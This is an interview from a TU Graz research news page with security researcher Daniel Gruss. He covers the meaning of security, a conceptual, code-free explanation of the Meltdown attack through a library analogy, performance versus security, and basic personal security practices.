News+Stories: You’re a security researcher and you deal with the security of computer systems. So, the first question is: what is security?
Daniel Gruss: When a system behaves the way I want and expect it to. It doesn’t matter whether it’s a computer system or real life. In real life, for example, this could be that I expect not to get sick. In the case of computer systems, for example, this may mean that my data is treated confidentially. Security is when it does exactly what I want it to do, no more and no less. But that always depends on expectations.
How do I recognise the expectations of the users?
Gruss: Sometimes it’s quite simple. If I use a password, then I expect that nobody will find out my password. If I use an encrypted hard drive, then I expect that nobody can access it. However, security must always be defined by people and is an expression of will. For example, if I don’t use a password, or use a very weak one, then that is also an expression of will and says that security is not so important to me.
Is it always such a conscious decision?
Gruss: No, absolutely not. Our world is too complex for that. But this is not only the case with computer systems. For example, if we were aware of all the health risks, we would probably behave very differently, not smoke or drink. But we don’t. It’s always about a gut feeling, an assessment. It’s the same with computers. We also need to develop a gut feeling for how we create security. For example, not to reply to every dubious spam email with your credit card number.
What kind of security are you investigating?
Gruss: In my working group, we are looking at the interface between hardware and software – the area where the operating system is located. A computer system is incredibly complex, consisting of billions of transistors and millions of lines of code. No human being could survey and understand the entire system in one lifetime. That’s why we resort to abstractions. But abstractions can never reflect reality 100 per cent and there will always be marginal cases that have not been considered. And that’s exactly what we’re looking at.
A famous example is Meltdown. I first talked about this idea with a colleague when we were sharing a hotel at a conference. I was convinced at the time that it wouldn’t work. If it were possible, I thought at the time, then someone would certainly have discovered it by now. But nobody had. Basically, it works like this: the attack consists of a simple single instruction – the smallest piece of software I can write. This single instruction accesses the memory of the operating system, but is not allowed to do so. The programme therefore crashes immediately. At this point, however, the attack is already over. For reasons of efficiency, the operating system loads the sensitive data into the cache in advance and then checks whether it can be accessed at all. And we can read out this data.
We have developed an analogy that makes it very clear. Imagine a library with a section for banned books. When I want to borrow one of them, the librarian stops me. So I tell him that I want to borrow an authorised book that starts with the first letter on the first page of the forbidden book. The librarian, who is authorised to access it, looks in the forbidden book, puts it back and asks me: “Which book beginning with the letter R would you like to borrow?” But I’ve changed my mind and now want a book that starts with the second letter on the first page of the forbidden book. So I can read the entire banned book without ever having it in my hand. It would really take an incredibly long time, but our current computer systems manage four or five instructions per nanosecond. In one second, he can get through a lot of letters.
Is it likely that such borderline cases will even be found by attackers?
Gruss: Well, we thought of it. So why not people who have bad intentions?
Where do you get such ideas from?
Gruss: That’s the hardest question of all. It is a very creative process. Not all the functions of a processor are known due to company secrets. So we develop theories about this and consider what could have been overlooked. And then we test. But I have to say that out of 100 ideas, maybe one will work. That’s wonderful from a security point of view, but not from a research point of view of course (laughs).
Why are such cases not considered directly during development?
Gruss: The goal of those who design computer systems is efficiency. So the focus is simply completely different. The whole scientific world view in this area is geared towards making things faster and better. This is not necessarily compatible with our world view, which focuses on everything that can go wrong.
Do performance and security go together at all?
Gruss: This is a question that we are asking ourselves in a new project for which I have been awarded an ERC Starting Grant. Many people think it’s a conflict. The more security I want, the more I lose in performance. And vice versa. In the new project, however, we have completely different, somewhat unusual hypotheses. Namely, that we can even use security to increase performance. It’s like a car. Many decades ago, engines were already capable of driving cars at speeds of up to 200 kilometres per hour. But there were still no seat belts, airbags or crumple zones. So even an accident at a speed of 50 kilometres per hour would have been fatal. But the safer the vehicles themselves became, the faster they could be driven at less risk. This has shifted the boundaries. And it’s the same with computer systems. If I make a system very fast, but it miscalculates once a minute, then I won’t be very happy. But if I also make sure that this error has no disadvantage or, ideally, is not noticed at all, then I can risk a lot more. We expect performance increases of up to 20 per cent. But this is a very lengthy process. We are only at the beginning and will lay important foundations over the next five years of the project, which can then be expanded over the coming decades.
How do you secure your own systems?
Gruss: Just like all other people. I don’t think it makes sense to be particularly paranoid here. If a secret service wants to monitor me, they’ll do it one way or another. The financial means are simply there to buy the best exploits. However, if they are “conventional” attackers, then the known security measures are sufficient: secure passwords, password managers, two-factor authentication and all the latest updates.
This research area is anchored in the Field of Expertise “Information, Communication & Computing”, one of five strategic foci of TU Graz.
You can find more research news on Planet research. Monthly updates from the world of science at Graz University of Technology are available via the research newsletter TU Graz research monthly.